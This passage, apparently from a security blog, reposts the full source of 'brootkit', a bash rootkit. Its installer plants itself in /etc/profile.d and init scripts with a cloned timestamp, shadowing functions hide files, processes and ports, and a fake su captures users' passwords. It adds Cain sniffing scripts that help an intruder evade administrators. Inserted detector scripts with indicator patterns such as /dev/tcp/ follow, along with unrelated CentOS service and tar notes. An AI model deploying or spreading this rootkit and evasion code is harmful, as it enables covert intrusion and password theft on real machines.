        if echo $port|grep -e ".*-.*" >/dev/null; then
            parse_port $port
        else
            br_ports[$br_port_num]=$port
            ((br_port_num++))
        fi
    done
    IFS=$tmp_ifs
}

function br_show_arg()
{
    echo -ne "\033[1;1H"
    echo -ne "\033[31;1mhost: $br_remote_host | total ports: $br_port_num | thread num: $br_thread_num "
    echo -e "timeout: $br_timeout | logfile: $br_logfile\n\033[0m"
}

function br_scan_init()
{
    echo -ne "\033[2J"
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
    max_row_num=$((MAX_ROW_NUM-5))
}

function br_scan_exit()
{
    echo -e "\033[?25h"
}

function br_usage()
{
    echo -e "$1 <-p> [-n|-t|-o|-h] <remote_host>\n"
    echo -e "option:"
    echo -e "-p\t\tports, pattern: port1,port2,port3-port7,portn..."
    echo -e "-n\t\tthread num, defalut is 10"
    echo -e "-t\t\ttimeout, default is 30s"
    echo -e "-o\t\tresults write into log file, default is brscan.log"
    echo -e "-h\t\thelp information."
    echo -e "\nexp:"
    echo -e "$1 -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org"
    echo -e "$1 -p 1-65525 -n 200 -t 20 www.cloud-sec.org"
}

function main()
{
    if [ $# -eq 0 ]; then
        br_usage $0
        exit 0
    fi

    while getopts "p:n:t:o:h" arg
    do
    case $arg in
        p)
            br_parse_port $OPTARG ;;
        n)
            br_thread_num=$OPTARG ;;
        t)
            br_timeout=$OPTARG ;;
        o)
            br_logfile=$OPTARG ;;
        h)
            br_usage $0
            exit 0
            ;;
        ?)
            echo "unkown arguments."
            exit 1
            ;;
        esac
    done

    shift $((OPTIND-1))
    br_remote_host=$@

    [ $br_port_num -lt $br_thread_num ] && br_thread_num=$br_port_num

    #br_show_ports
    br_scan_init
    br_play_init
    br_show_arg
    br_scan_port
    br_scan_exit
}

main $@

brdaemon.sh is a script that runs bashbd.sh in the background

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_hookhup()
{
        :
}

function br_daemon()
{
    if ! type nohup >/dev/null; then
                nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
                [ $? -eq 1 ] && exit
        else
                trap br_hookhup SIGHUP
                $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
                [ $? -eq 1 ] && exit
        fi
}

br_daemon

The install.sh script is just this

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_rootkit()
{
    cp brootkit.sh /etc/profile.d/emacs.sh # copy the rootkit script to this directory; it is executed every time a login shell is opened
    touch -r /etc/profile.d/vim.sh /etc/profile.d/emacs.sh # give emacs.sh the timestamps of vim.sh
}

function br_hookhup()
{
    :
}

function main()
{
    mkdir -p $BR_ROOTKIT_PATH -m 0777 # create the directory that holds all the files
    [ $? -eq 1 ] && exit && echo "mkdir $BR_ROOTKIT_PATH failed."

    cp brootkit.sh br.conf br_config.sh bashbd.sh brscan.sh $BR_ROOTKIT_PATH
    [ $? -eq 1 ] && exit && echo "copy brootkit failed."

    cp brdaemon.sh /etc/rc.d/init.d/brdaemon # copy the control script to the system's init script directory
    ln -s /etc/rc.d/init.d/brdaemon /etc/rc.d/rc3.d/S10brdaemon # start the script in runlevel 3; applies to Red Hat family Linux
    [ $? -eq 1 ] && exit && echo "copy brdaemon failed."

    chmod 777 $BR_ROOTKIT_PATH

    if ! type nohup >/dev/null; then
        nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    else
        trap br_hookhup SIGHUP
        $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    fi

    br_rootkit
    [ $? -eq 1 ] && exit && echo "install brootkit failed." || \
        echo "install brootkit successful."
}

main

According to the man page, touch -r means the following

-r Use the access and modifications times from the specified file instead of the current time of day.

OK, on to the last script. Its main function is this: it runs every time a user logs in, replaces system commands, and hides the relevant files according to the config file. It goes like this

#!/bin/bash
# Lightweight rootkit implemented by bash shell scripts v0.01
#
# by wzt 2015   http://www.cloud-sec.org
#

declare -r builtin
declare -r declare
declare -r set
declare -r fake_unset
declare -r type
declare -r typeset

unalias ls >/dev/null 2>&1

BR_ROOTKIT_PATH="/usr/include/..."

function abcdmagic()
{
    :
}

function builtin()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "declare"|"set"|"unset"|"command"|"type"|"typeset")
            fake_a="$(command builtin $1 $2)"
            if [ $2 == " " ];then
                fake_b=${fake_a/br_hide_file\=*/}
            else
                fake_b=${fake_a/\/bin\/ls?()*/}
            fi
            echo -n "$fake_b"
            reset_command
            return ;;
        "builtin")
            echo "bash: builtin: builtin: syntax error, bash($BASH_VERSION) is not support."
            reset_command
            return ;;
        *)
            command builtin $1 $2
            reset_command
            ;;
    esac
}

function declare()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/\/bin\/ls?()*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command declare $1 $2
            reset_command
            return ;;
    esac
}

function typeset()
{
    local fake_a fake_b

    unset command
    case $1 in
        ""|"-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command typeset $1 $2
            reset_command
            return ;;
    esac
}

function type()
{
    case $1 in
        "builtin"|"declare"|"set"|"unset"|"type"|"typeset")
            echo "$1 is a shell builtin"
            return ;;
        "dir")
            echo "dir is /usr/bin/dir"
            return ;;
        "ls")
            echo "ls is aliased to ls --color=tty"
            return ;;
        "ps")
            echo "ps is /bin/ps"
            return ;;
        "netstat")
            echo "netstat is hashed (/bin/netstat)"
            return ;;
        "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/bin/netstat")
            echo "$1 is $1"
            return ;;
        *)
            unset command
            command type $1 $2
            reset_command
            return ;;
    esac
}

function set()
{
    local fake_a fake_b

    unset command
    case $1 in
        "")
            fake_a="$(command set)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-x"|"+x")
            return ;;
        *)
            echo $1 $2
            command set $1 $2
            reset_command
            return ;;
    esac
}

function fake_unset()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset $1 $2
            return ;;
    esac
}

function fake_command()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset command
            command $1 $2
            reset_command
            return ;;
    esac
}

function command()
{
    case $1 in
        "builtin")
            builtin $2 $3
            return ;;
        "declare")
            declare $2 $3
            return ;;
        "set")
            set $2 $3
            return ;;
        "unset")
            fake_unset $2 $3
            . brootkit.sh
            return ;;
        "type")
            type $2 $3
            return ;;
        "typeset")
            typeset $2 $3
            return ;;
        "command")
            fake_command $2 $3
            return ;;
        *)
            unset command
            command $2 $3
            . brootkit.sh
            return ;;
    esac
}

function reset_command()
{
    function command()
    {
        case $1 in
            "builtin")
                builtin $2 $3
                return ;;
            "declare")
                declare $2 $3
                return ;;
            "set")
                set $2 $3
                return ;;
            "unset")
                fake_unset $2 $3
                . brootkit.sh
                return ;;
            "type")
                type $2 $3
                return ;;
            "typeset")
                typeset $2 $3
                return ;;
            "command")
                fake_command $2 $3
                return ;;
            *)
                unset command
                command $2 $3
                . brootkit.sh
                return ;;
        esac
    }
}

function su()
{
    local arg_list=("" "-" "-l" "--login"
            "-c" "--command" "--session-command"
            "-f" "--fast"
            "-m" "--preserve-environment" "-p"
            "-s" "--shell=SHELL")
    local flag=0 tmp_arg arg pass

    if [ $UID -eq 0 ]; then
        /bin/su $1; unset su ; return $?
    fi

    for arg in ${arg_list[@]}
    do
        [ "$1" = "$arg" ] && flag=1
    done

    [ $# -eq 0 ] && flag=1

    tmp_arg=$1;tmp_arg=${tmp_arg:0:1};
    [ "$tmp_arg" != "-" -a $flag -eq 0 ] && flag=1

    if [ $flag -ne 1 ];then
        /bin/su $1; return $?
    fi

    [ ! -f /tmp/... ] && `touch /tmp/... && chmod 777 /tmp/... >/dev/null 2>&1`

    echo -ne "Password:\r\033[?25l"
    read -t 30 -s pass
    echo -ne "\033[K\033[?25h"

    /bin/su && unset su && echo $pass >> /tmp/...
}

unalias ls >/dev/null 2>&1

function max_file_length()
{
    local tmp_file sum=0 n=0

    for tmp_file in `/bin/ls $@`
    do
        n=${#tmp_file}
        [ $n -gt $sum ] && sum=$n
    done

    return $sum
}

function ls()
{
    local fake_file max_col_num file_format
    local hide_file hide_flag file_arg old_ifs
    local file_len=0 sum=0 n=0 display_mode=0

    max_col_num=`stty size|cut -d " " -f 2`

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    for file_arg in $@
    do
        if echo $file_arg|grep -q -e "^-.*l.*"; then
            display_mode=1; break
        fi
    done

    case $display_mode in
    0)
        unset -f /bin/ls
        max_file_length $@
        file_len=$?

        for fake_file in $(/bin/ls $@)
        do
            hide_flag=0
            old_ifs=$IFS; IFS=","
            for hide_file in ${br_hide_file[@]}
            do
                if echo "$fake_file"|grep -e "^$hide_file" >/dev/null;then
                    hide_flag=1; break
                fi
            done
                IFS=$old_ifs

            [ $hide_flag -eq  1 ] && continue

            n=${#fake_file}
            ((sum=sum+n+file_len))

            if [ $sum -gt $max_col_num ];then
                file_format="%-$file_len""s\n"
                printf $file_format $fake_file
                sum=0
            else
                file_format="%-$file_len""s "
                printf $file_format $fake_file
            fi
        done

        [ $sum -le $max_col_num ] && echo ""
        reset_ls
        return ;;
    1)  
        unset -f /bin/ls

        fake_file=`/bin/ls $@`
        old_ifs=$IFS; IFS=","
        for hide_file in ${br_hide_file[@]}
        do
            fake_file=`echo "$fake_file" | sed -e '/'$hide_file'/d'`
        done
        IFS=$old_ifs
        echo "$fake_file"
        reset_ls

        return ;;
    esac
}

function dir()
{
    ls $@
}

function /usr/bin/dir()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function reset_ls()
{
    function /bin/ls()
    {
        unset -f /bin/ls
        ls $@
        reset_ls
    }
}

function /bin/ls()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function ps()
{
    local proc_name hide_proc old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","

    proc_name=`/bin/ps $@`
    for hide_proc in ${br_hide_proc[@]}
    do
        proc_name=`echo "$proc_name" | sed -e '/'$hide_proc'/d'`
    done

    echo "$proc_name"
    IFS=$old_ifs
}

function reset_ps()
{
    function /bin/ps()
    {
        unset -f /bin/ps
        ps $@
        reset_ps
    }
}

function /bin/ps()
{
    unset -f /bin/ps
    ps $@
    reset_ps
}

function netstat()
{
    local hide_port tmp_port old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","
    tmp_port=`/bin/netstat $@`
    for hide_port in ${br_hide_port[@]}
    do
        tmp_port=`echo "$tmp_port" | sed -e '/'$hide_port'/d'`
    done
    echo "$tmp_port"
    IFS=$old_ifs
}

function reset_netstat()
{
    function /bin/netstat()
    {
        unset -f /bin/netstat
        netstat $@
        reset_netstat
    }
}

function /bin/netstat()
{
    unset -f /bin/netstat
    netstat $@
    reset_netstat
}
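Everything brootkit.sh does to stay hidden happens inside the login shell: functions named ls, ps, netstat, /bin/ls and even builtin, declare and command intercept what the user types, and install.sh plants the script in /etc/profile.d with a cloned timestamp. The following added example (my code, not part of brootkit or the original post) turns those same constructs into indicators: it greps a directory of login scripts for command-shadowing functions, read-only locks on builtin names, /dev/tcp redirections and touch -r timestamp cloning, and it cross-checks a directory listing against find(1), which runs as a separate binary that a shell function cannot filter. It assumes a POSIX sh with grep -E, comm, find and mktemp; the sample files it builds are constructed, not real indicators, and the function names are mine.

```shell
#!/bin/sh
# Added example: audit login scripts for brootkit-style constructs and expose
# entries hidden from a shadowed ls. Not part of brootkit or the original post.
# Assumes POSIX sh plus grep -E, comm, find and mktemp. The sample files built
# in br_demo are constructed for illustration, not real indicators.

# One extended regex per line, each taken from a construct in brootkit.sh,
# bashbd.sh or install.sh above.
BR_INDICATORS='function[[:space:]]+(/bin/|/usr/bin/)?(ls|dir|ps|netstat|su)[[:space:]]*\(\)
function[[:space:]]+(builtin|declare|set|type|typeset|command)[[:space:]]*\(\)
declare[[:space:]]+-r[[:space:]]+(builtin|declare|set|type|typeset)([[:space:]]|$)
/dev/tcp/
exec[[:space:]]+[0-9]+<>
pty\.spawn\(
touch[[:space:]]+-r[[:space:]]'

# Print each suspicious line of FILE as "lineno:text" (grep -n). An unreadable
# or missing file yields no output. Exit status follows grep (1 = no hits).
br_scan_script() {
    [ -r "$1" ] || return 1
    printf '%s\n' "$BR_INDICATORS" | grep -E -n -f - -- "$1"
}

# Number of suspicious lines in FILE, always printed as a bare integer.
br_count_hits() {
    br_scan_script "$1" | wc -l | tr -d ' '
}

# Audit every regular file in DIR (for example /etc/profile.d). Prints
# "hits<TAB>path" per flagged file; returns 1 if anything was flagged.
br_audit_dir() {
    _flagged=0
    for _f in "$1"/*; do
        [ -f "$_f" ] || continue
        _n=$(br_count_hits "$_f")
        if [ "$_n" -gt 0 ]; then
            printf '%s\t%s\n' "$_n" "$_f"
            _flagged=1
        fi
    done
    return $_flagged
}

# Names that find(1) sees in DIR but "ls -A" does not. find is a separate
# binary, so a shell function named ls, /bin/ls or command cannot filter it;
# any output here means the listing the shell shows is being edited.
br_hidden_entries() {
    _a=$(mktemp) || return 1
    _b=$(mktemp) || return 1
    ls -A -- "$1" | sort > "$_a"
    (cd "$1" && find . ! -name . -prune | sed 's#^\./##') | sort > "$_b"
    comm -13 "$_a" "$_b"
    rm -f "$_a" "$_b"
}

# Demo on a constructed directory: one script mimicking the planted
# /etc/profile.d/emacs.sh (inert text, nothing in it is executed) and one
# benign script.
br_demo() {
    _tmp=$(mktemp -d) || return 1
    cat > "$_tmp/emacs.sh" <<'EOF'
declare -r builtin
function ls()
{
    :
}
exec 9<> /dev/tcp/127.0.0.1/8080
EOF
    printf 'export EDITOR=vim\n' > "$_tmp/vim.sh"
    br_audit_dir "$_tmp"          # prints "3<TAB>.../emacs.sh", returns 1
    br_scan_script "$_tmp/emacs.sh"
    rm -rf "$_tmp"
}

br_demo
```

On a real host the two checks complement each other: br_audit_dir /etc/profile.d reads the planted script as plain text, so the function overrides never run, and br_hidden_entries on the directory where br.conf lists hidden names reveals them because find does not go through the shell's function table.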


Some notes on sniffing

Published: June 3, 2015 // Categories: reposted articles, windows // No Comments

Fixing Cain sniffing hanging the server

While sniffing, the server hangs and you cannot even log in any more; I'm sure everyone has run into this. Many people have discussed the problem. The idea behind the script circulating online is: first set Cain to resume sniffing after a reboot, then reboot whenever access to some ip times out. Rebooting makes too much noise; killing the process is more reasonable. So I wrote a batch file: when the network gets stuck it exits automatically, and once the network is fine again it starts automatically.

Modifications and better suggestions are welcome

@echo off
:top
ping -n 1 -l 1 61.135.169.105
IF ERRORLEVEL 1 GOTO kill
IF ERRORLEVEL 0 GOTO start

:start
TaskList|Findstr /i "cain.exe"
If ErrorLevel 1 (
start cain.exe
)
goto top

:kill
TaskList|Findstr /i "cain.exe"
If ErrorLevel 0 (
taskkill /f -im cain.exe
ping 127.0.1 -n 10 -l 1
 )
goto top

The tool everyone uses is Cain, and everyone knows how to use it. But while Cain is sniffing, if it hits a target with heavy traffic it often brings the host running Cain to its knees, which draws the administrator's attention. Sometimes, after sniffing for a while, it kills 3389. I have no better way than to let Cain sniff for a while, stop it, and start again. If you stop Cain by hand every time, sometimes the timing is off and 3389 is already dead. Actually the problem is simple to solve; a simple batch script does it. The script is as follows:

ping 127.0.0.1 -n 5000>nul
taskkill /F /PID 4144


In the batch script above, 5000 is the number of seconds, used to control how long Cain sniffs. 4144 is Cain's process number (PID); you can find it with tasklist. This way you can safely go and do other things while it sniffs.

Next, Cain sniffing is usually done over 3389, and if an administrator logs in on 3389 at that point it is awkward. My friend Netpatch wrote a terminal-monitoring script: as soon as it sees two people logged into the terminal at the same time, it logs itself off. The script is as follows:

on error resume next
set arg=wscript.arguments
If arg.count=0 then
wscript.echo "use:// cscript.exe FS.vbs port"
wscript.sleep 1000
wscript.quit
End If
Tport=arg(0)
Runs=false
While runs=false
Dim oShell,oExec,strOut,oRegExp,Matches,Match,Num,Tport
Set oShell = WScript.CreateObject("WScript.Shell")
Set oExec = oShell.Exec("netstat -an")
Set oRegExp = new RegExp
oRegExp.Pattern = "TCP[\s]+[\d\.]+:"&Tport&"[\s]+[\d\.]+:[\d]+[\s]+ESTABLISHED"
oRegExp.IgnoreCase = True
oRegExp.Global = True
Do While Not oExec.StdOut.AtEndOfStream
strOut = strOut & oExec.StdOut.ReadLine() & Chr(13) & Chr(10)
Loop
Set Matches = oRegExp.Execute(strOut)
Num = 0
For Each Match In Matches
Num = Num + 1
Next
if num > 1 then
Runs=true
oShell.run "logoff"
end if
Set Matches = Nothing
Set oRegExp = Nothing
Set oExec = Nothing
Set oShell = Nothing
wend


Run this script when you log into the terminal; it is also a fairly good way of hiding yourself.
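The session check the VBS script performs, reimplemented as an added example (my code, not from the post or from Netpatch's script) in POSIX shell so the counting logic can be read and tested on its own. It parses netstat -an style output from stdin and counts ESTABLISHED TCP sessions on a given local port; an administrator can use the same count to alert when a remote-desktop port has more than one active session. It handles both the Windows column layout and the Linux one, the sample output is constructed, and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the post or from Netpatch's script: count the
# ESTABLISHED TCP sessions on one local port in "netstat -an" output read
# from stdin. Assumes POSIX sh and awk. Handles the Windows layout
# (proto, local, foreign, state) and the Linux layout (proto, recv-q,
# send-q, local, foreign, state) because the local address is taken as the
# first field that ends in ":<port>". SAMPLE_NETSTAT is constructed.

count_established_on_port() {
    awk -v port="$1" '
        toupper($1) ~ /^TCP/ && $NF == "ESTABLISHED" {
            for (i = 2; i <= NF; i++) {
                if ($i ~ /:[0-9]+$/) {      # first address:port field is the local socket
                    n = split($i, a, ":")   # port follows the last colon (also for [::]:3389)
                    if (a[n] == port) c++
                    break
                }
            }
        }
        END { print c + 0 }'
}

# Exit status 0 when more than one session is active on PORT (the condition
# the VBS script reacts to), 1 otherwise. Reads netstat output from stdin.
has_concurrent_sessions() {
    [ "$(count_established_on_port "$1")" -gt 1 ]
}

# Constructed sample in the Windows "netstat -an" layout (documentation IPs).
SAMPLE_NETSTAT='  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:3389        198.51.100.7:51234     ESTABLISHED
  TCP    192.0.2.10:3389        203.0.113.9:60110      ESTABLISHED
  TCP    192.0.2.10:445         198.51.100.7:51300     ESTABLISHED
  TCP    [::]:3389              [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*'

# Stand-alone demo on the sample; on a live host: netstat -an | has_concurrent_sessions 3389
printf '%s\n' "$SAMPLE_NETSTAT" | count_established_on_port 3389   # prints 2
```

The VBS regex only matches dotted IPv4 addresses; taking the port after the last colon instead also covers IPv6 entries such as [::]:3389, which is why the example does not reuse that pattern verbatim.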

CentOS boot service optimization notes

Published: June 2, 2015 // Categories: work log, ops work, linux, reposted articles // No Comments

Default list of services started at boot:

Service | Function | Default | Suggested | Notes
NetworkManager | Connects to networks automatically, common on laptops | on | off | Useless on a server; servers normally have a fixed network configuration and do not obtain IPs automatically
abrt-ccpp | | on | your choice | Useless on a server
abrt-oops | | on | your choice | Useless on a server
abrtd | | on | your choice | Useless on a server
acpid | Power-button detection and management, common on laptops | on | your choice | Useless on a server
atd | Runs a command at a specified time | on | off | Can be turned off if you use crond
auditd | Audit daemon | on | on | Needs to be on if you use SELinux
autofs | Automatic mounting and unmounting of filesystems | on | your choice | Enable only when needed; can be turned off
avahi-daemon | Local network service discovery | on | off | Useless on a server
avahi-dnsconfd | avahi DNS | off | off | Useless on a server
bluetooth | Bluetooth wireless communication | on | off | Useless on a server
dund | Bluetooth related | on | off | Useless on a server
hidd | Bluetooth related | on | off | Useless on a server
pand | Bluetooth related | off | off |
conman | Console management | off | off | Useless
certmonger | | off | off |
cpuspeed | Scales CPU frequency to save power, common on laptops | on | off | Useless on a server
crond | Scheduled task management | on | on | Commonly used, keep on
cups | Common UNIX Printing System | on | off | Useless on a server
dnsmasq | DNS cache | off | off | DNS caching service, not needed
firstboot | Initial setup after system installation | off | off |
fcoe | Open-FCoE initiator, Fibre Channel over Ethernet | on | off | Useless unless the server is directly attached over fibre
gpm | Mouse support on the console | on | on |
haldaemon | Hardware information collection | on | on |
ibmasm | IBM hardware management | off | off |
ip6tables | IPv6 firewall | on | off | Use it if you use IPv6 networking; normally off
iptables | IPv4 firewall | on | on | IPv4 firewall service
irda | Infrared communication | off | off | Useless
irqbalance | CPU load balancing | on | your choice | Needed on multi-core CPUs
iscsi | Network storage related | on | off |
iscsid | Network storage related | on | off |
kdump | Hardware change detection | off | off | Useless on a server
kudzu | Hardware change detection, on older releases | off | off | Useless on a server
livesys | Installation-related service | on | off |
livesys-late | Installation-related service | on | off |
lvm2-monitor | LVM monitoring | on | your choice | Enable if you use LVM logical volumes
blk-availability | lvm2 related | on | your choice | Recommended on if you use LVM, otherwise not needed
mcstrans | Checks contexts when SELinux is enabled | on | off |
matahari-broker | | off | off | Not sure what this service is; I turn it off
matahari-host | | off | off | Not sure what this service is; I turn it off
matahari-network | | off | off | Not sure what this service is; I turn it off
matahari-service | | off | off | Not sure what this service is; I turn it off
matahari-sysconfig | | off | off | Not sure what this service is; I turn it off
mdmonitor | Software RAID monitoring | on | your choice | Enable on servers that use software RAID
mdmpd | Software RAID management | off | off |
multipathd | | off | off |
messagebus | Passes messages between system processes | on | on | If disabled, haldaemon fails to start
microcode_ctl | CPU microcode management and updates | on | off |
netconsole | | off | off |
netfs | Mounts network filesystems at boot | on | off | Enable if you use NFS
network | Activates all network interfaces at boot | on | on | Basic network service, required!
netplugd | Network cable hot-plug monitoring | off | off |
nfs | Network File System | off | off | NFS file service, enable if used
nfslock | NFS related | on | off | NFS related service, enable if used
nscd | Name cache, presumably DNS related | off | off |
ntpd | Time synchronization | off | your choice | Network time service, enable if used
ntpdate | Time synchronization | off | off |
oddjobd | D-BUS related | off | off |
portreserve | RPC service related | on | your choice | Can be turned off
pcscd | PC/SC smart card daemon | on | off |
portmap | Port mapper used by NFS and NIS | on | off |
postfix | Mail server replacing sendmail | on | your choice | Can be turned off if there is no mail service
psacct | Load monitoring | off | off | Can be turned off
qpidd | Messaging | on | on |
quota_nld | | off | off | Can be turned off
rdisc | Automatic router discovery | off | off |
rawdevices | Raw device support | on | on |
readahead_early | Read-ahead related | on | on |
readahead_later | | off | off |
restorecond | SELinux related | off | off | Needs to be on if SELinux is enabled
rpcbind | | on | on | Critical basic service; NFS and desktop environments depend on it. Equivalent to portmap on CentOS 5.x.
rpcgssd | NFS related | on | off | NFS related service, optional
rpcidmapd | RPC name to UID/GID mapper | on | off | NFS related service, optional
rpcsvcgssd | NFS related | off | off | NFS related service, optional
rsyslog | Provides the system log records | on | on | Critical system logging service, required!
syslog | System logging related | on | on |
saslauthd | SASL authentication related | off | off |
smartd | Disk self-monitoring daemon | off | off |
spice-vdagentd | | on | on |
sshd | SSH server, provides secure shell login | on | on | SSH remote login service, required!
sssd | | off | off |
sendmail | Mail service | on | your choice |
sysstat | | on | on | A set of system monitoring tools, commonly used
tcsd | | off | off |
udev-post | Device management system | on | on |
wdaemon | | off | off |
wpa_supplicant | Wireless authentication related | off | off |
xfs | X Window related | on | off |
ypbind | Network Information Service client | off | off |
yum-updatesd | yum automatic updates | on | off |

List the services currently enabled at boot:

chkconfig --list | grep '3:on' | awk '{print $1}'

The changes I applied:

chkconfig bluetooth off
chkconfig auditd off
chkconfig cups off
chkconfig yum-updatesd off
chkconfig smartd off
chkconfig sendmail off
chkconfig ip6tables off
chkconfig atd off
chkconfig iscsi off
chkconfig iscsid off
chkconfig microcode_ctl off

This varies by machine and environment; it is only recorded here as a reminder.
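As an added example (not from the original post), this shell script turns the listing-then-disable procedure above into a repeatable audit: it compares a constructed chkconfig --list listing against an allowlist of services that must stay on and prints the chkconfig commands for everything else. The sample listing, the allowlist and the function names are assumptions.

```shell
#!/bin/sh
# Added example: audit runlevel-3 boot services against an allowlist and
# print the chkconfig commands needed to turn the rest off (nothing is run).
# SAMPLE_CHKCONFIG is constructed to look like `chkconfig --list` output.
SAMPLE_CHKCONFIG='auditd         0:off 1:off 2:on  3:on  4:on  5:on  6:off
bluetooth      0:off 1:off 2:on  3:on  4:on  5:on  6:off
crond          0:off 1:off 2:on  3:on  4:on  5:on  6:off
cups           0:off 1:off 2:on  3:on  4:on  5:on  6:off
iptables       0:off 1:off 2:on  3:on  4:on  5:on  6:off
network        0:off 1:off 2:on  3:on  4:on  5:on  6:off
smartd         0:off 1:off 2:off 3:off 4:off 5:off 6:off
sshd           0:off 1:off 2:on  3:on  4:on  5:on  6:off
yum-updatesd   0:off 1:off 2:on  3:on  4:on  5:on  6:off'

# Services that must stay enabled: the "required" rows of the table plus auditd.
ALLOWED="auditd crond iptables network rsyslog sshd"

# services_on_at_runlevel3 LISTING -> names enabled at runlevel 3, one per line
services_on_at_runlevel3() {
    printf '%s\n' "$1" | grep '3:on' | awk '{print $1}'
}

# extra_services LISTING -> enabled services that are not in ALLOWED
extra_services() {
    services_on_at_runlevel3 "$1" | while read -r svc; do
        case " $ALLOWED " in
            *" $svc "*) ;;          # allowed, keep it
            *) echo "$svc" ;;       # candidate for chkconfig ... off
        esac
    done
}

# print_disable_commands LISTING -> one "chkconfig NAME off" line per extra service
print_disable_commands() {
    extra_services "$1" | sed 's/^/chkconfig /; s/$/ off/'
}

print_disable_commands "$SAMPLE_CHKCONFIG"
```

Replace SAMPLE_CHKCONFIG with the real `chkconfig --list` output and review the printed commands before running any of them.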

Recommended reading

"Optimizing and configuring a minimal-install CentOS 6.5 for production servers" http://www.lvtao.net/server/centos-server-setup.html

Excluding a directory or a file type when compressing with tar on Linux

Published: May 19, 2015 // Categories: work log, code study, linux, reposts // No Comments

Packing with tar is usually straightforward: just run tar -zcvf test.tar.gz test.

Often, though, the directory we want to pack has dozens of subdirectories and files, and we need to leave one or two of those directories or files out of the archive.

In that case, adding the --exclude option to the tar command does the job.

For example:

Taking tomcat as an example, to leave out the tomcat/logs directory when packing, the command is:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs tomcat

To exclude several directories, add more --exclude options. The following command excludes the logs and libs directories and the file xiaoshan.txt:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs --exclude=tomcat/libs --exclude=tomcat/xiaoshan.txt tomcat

One thing to watch out for:

Everyone knows that pressing Tab on Linux auto-completes directory names; it is convenient and widely used.

For instance, typing tomcat/lo and pressing Tab makes the command line produce tomcat/logs/ ; for a directory, a trailing "/" is appended.

The catch is that when excluding with tar's --exclude, you must not include that trailing "/", otherwise the logs directory and the files under it still end up in the archive.

Wrong:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs/ --exclude=tomcat/libs/ tomcat

Correct:

tar -zcvf tomcat.tar.gz --exclude=tomcat/logs --exclude=tomcat/libs tomcat

You can also exclude a given file type (quote the pattern so the shell does not expand it first):

tar -cvf test.tgz test/ --exclude '*.jpg'

This excludes every file with the jpg suffix, including those in subdirectories! To exclude several suffixes, append more patterns; there is no limit:

tar -cvf test.tgz test/ --exclude '*.txt' --exclude '*.jpg'

The above matches file types by suffix; you can also name a file directly:

tar -cvf test.tgz test/ --exclude a.txt

Or name a directory; directories, files and patterns can be mixed:

tar -cvf test.tgz test/ --exclude dir1 --exclude a.log --exclude '*.jpg'
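As an added example (not from the original post), this shell script builds a throwaway tomcat-like tree, archives it with --exclude, and then checks the archive listing to confirm the excluded directory really stayed out; it runs both the correct and the trailing-slash form so you can verify the behaviour on your own tar version. The directory tree, file names and function names are constructed assumptions.

```shell
#!/bin/sh
# Added example: verify from the archive listing that --exclude did its job.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
# constructed sample tree: a logs dir we want out, plus content we want kept
mkdir -p "$WORK/tomcat/logs" "$WORK/tomcat/libs" "$WORK/tomcat/webapps"
echo "log line" > "$WORK/tomcat/logs/catalina.out"
echo "jar"      > "$WORK/tomcat/libs/app.jar"
echo "index"    > "$WORK/tomcat/webapps/index.html"

# count_members ARCHIVE PREFIX -> number of archive members whose name starts with PREFIX
count_members() {
    tar -tzf "$1" | grep -c "^$2" || true
}

# pack_excluding PATTERN ARCHIVE -> archive tomcat/ from $WORK, excluding PATTERN
pack_excluding() {
    ( cd "$WORK" && tar -zcf "$2" --exclude="$1" tomcat )
}

# logs_excluded PATTERN -> "yes" when the archive built with PATTERN has no
# member under tomcat/logs, "no" otherwise
logs_excluded() {
    pack_excluding "$1" "$WORK/out.tar.gz"
    if [ "$(count_members "$WORK/out.tar.gz" tomcat/logs)" -eq 0 ]; then
        echo yes
    else
        echo no
    fi
}

echo "--exclude=tomcat/logs  -> logs excluded: $(logs_excluded tomcat/logs)"
echo "--exclude=tomcat/logs/ -> logs excluded: $(logs_excluded tomcat/logs/)"
```

The same `tar -tzf | grep` check is worth running on any backup archive before relying on it.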

 

PHPCMS V9: a do-anything vulnerability

